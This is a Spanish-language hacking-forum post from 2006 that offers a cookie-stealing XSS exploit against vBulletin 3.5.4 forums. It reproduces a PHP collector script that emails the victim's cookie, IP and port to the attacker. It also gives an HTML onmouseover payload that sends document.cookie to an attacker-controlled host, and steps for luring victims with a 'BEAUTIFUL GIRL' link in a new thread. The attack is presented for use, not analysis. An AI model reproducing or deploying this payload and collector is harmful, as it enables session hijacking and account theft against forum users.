hacker


Ingresar con nombre de usuario, contraseña y duración de la sesión
| Portal Hacker | Editorial | Descargas | Ezine |
Inicio Ayuda Ingresar Registrarse
08 de ſeptiembre de 2008, 01:57:52
Noticias: Caracteres maximos de las firmas
Para ver este enlace Registrate o Inicia Sesion
> leer

+  Foros pOrtal Hacker
|-+  Hacktivismo
| |-+  Bugs y Exploits (Moderador: vengador de las sombras)
| | |-+  Destrozando Foros vBulletin v3.5.4 [2 Tecnicas] By OzX		 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Destrozando Foros vBulletin v3.5.4 [2 Tecnicas] By OzX  (Leído 678 veces)
OzX
Visitante
« : 24 de ſeptiembre de 2006, 10:00:43 »
By OzX


Navegando Por la Red , encontre Con un video en donde muestran Una vulnerabilidad en los foros VBulletin 3.5.4, sigue siendo la misma vulnerabilidad que la version anterior VBulletin 3.5.2 Pero esta vez cambian algunos "codes".


Descarga:


Para ver este enlace Registrate o Inicia Sesion
Opcion 1: Descarga De Video Vbulletin 3.5.4


Para ver este enlace Registrate o Inicia Sesion
Opcion 2: Descarga de Video Vbulletin 3.5.4




Tb Encontre un Exploit XSS Para la Version Vbulletin 3.5.4, este exploit esta en Php , por lo consiguiente tenemos que alojarlo en algun servidor que soporte Php, Tb ahy que fijarnos que nos pide algunos datos, Nos es copiar y pegar, como la direccion de Mail, y las instrucciones para poder colocar el Exploit en el Sitio Web.

Código:
_________________________________________________________________________


          /      \
       \  \  ,,  /  /
        '-.`\()/`.-'
       .--_'(  )'_--.
      / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
       |  |  ><  |  |
       \  \      /  /
           '.__.'       


=> Xss Vbulletin 3.5.x ( test: 3.5.4 )
=> Author: SpiderZ
=> Sito: www.spiderz.tk

_________________________________________________________________________


( 1 )

--------------------------------------------------------------------

Name file:  exploit.php

--------------------------------------------------------------------


<?php
$ip_adresse $_SERVER['REMOTE_ADDR'];
if(!empty($ip_adresse))
{
echo 'il tuo ip ?: ',$ip_adresse;
}
else
{
echo 'Impossible d\'afficher l\'IP';
}
?>

<a href="log.php"></a><?
$xx1=$HTTP_SERVER_VARS['SERVER_PORT'];
$day = date("d",time()); $month = date("m",time()); $year = date("Y",time());
if ($REMOTE_HOST == "") $visitor_info = $REMOTE_ADDR;
else $visitor_info = $REMOTE_HOST;
$base = 'http://' . $HTTP_SERVER_VARS['SERVER_NAME'] . $PHP_SELF;
$x1=`host $REMOTE_ADDR|grep Name`;
$x2=$REMOTE_PORT;
?>

<?php
$cookie $_GET['c'];
?>

<?php
$myemail "YOUR ADDRESS E-MAIL";
$today date("l, F j, Y, g:i a") ;
$subject "Xss Vbulletin" ;
$message "Xss: Hacking
Ip: $ip_adresse
Cookie: $cookie
Url: $base
porta usata: $xx1
remote port: $x2
Giorno & Ora : $today  \n
";
$from "From: $myemail\r\n";
mail($myemail$subject$message$from);
?>



--------------------------------------------------------------------

<?php
$myemail "YOUR ADDRESS E-MAIL";

--------------------------------------------------------------------


)

--------------------------------------------------------------------

Name file:  image.gif

--------------------------------------------------------------------


<pre a='>' onmouseover='document.location="http://YOUR ADDRESS WEB.com/exploit.php?c="+document.cookie' b='</pre' >


--------------------------------------------------------------------

location="http://YOUR ADDRESS WEB.com

--------------------------------------------------------------------


( 3 )

--------------------------------------------------------------------

Like Using
--------------------------------------------------------------------

1°  new thread
2°  <a href="http://YOUR ADDRESS WEB.com/IMAGE.GIF" target="_blank">BEAUTIFUL GIRL</a> '
3°  Submit
4°  It waits for

--------------------------------------------------------------------


# www.spiderz.tk 


By OzX
En línea
Páginas: [1] Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC hacker

Juegos gratis - Articulos PHP - Juegos - Trucos - Letras - Juegos - Juegos Online